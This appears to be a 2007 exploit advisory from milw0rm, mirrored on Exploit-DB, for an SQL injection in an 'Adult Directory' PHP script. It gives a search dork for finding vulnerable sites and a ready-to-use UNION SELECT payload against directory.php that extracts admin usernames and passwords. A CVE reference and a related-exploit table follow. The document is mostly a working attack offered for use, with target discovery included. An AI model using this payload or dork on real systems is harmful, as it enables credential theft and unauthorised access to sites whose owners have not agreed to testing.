--==+================================================================================+==-- --==+ Adult Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: http://photo.sourceforge.net/ DORK: altavista.com > "Search Adult Directory:" DESCRIPTION: pull out admin login details EXPLOITS: http://server.com/directory.php?ax=list&sub=7&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/FROM/**/admin/* NOTE/TIP: GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+================================================================================+==-- --==+ Adult Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- # milw0rm.com [2007-07-27]
Related Exploits
Trying to match CVEs (1): CVE-2007-4056Trying to match OSVDBs (1): 37267
Other Possible E-DB Search Terms: Adult Directory
Date | D | V | Title | Author |
---|---|---|---|---|
2008-10-31 |
![]() |
SFS EZ Adult Directory - 'directory.php' SQL Injection | Hurley |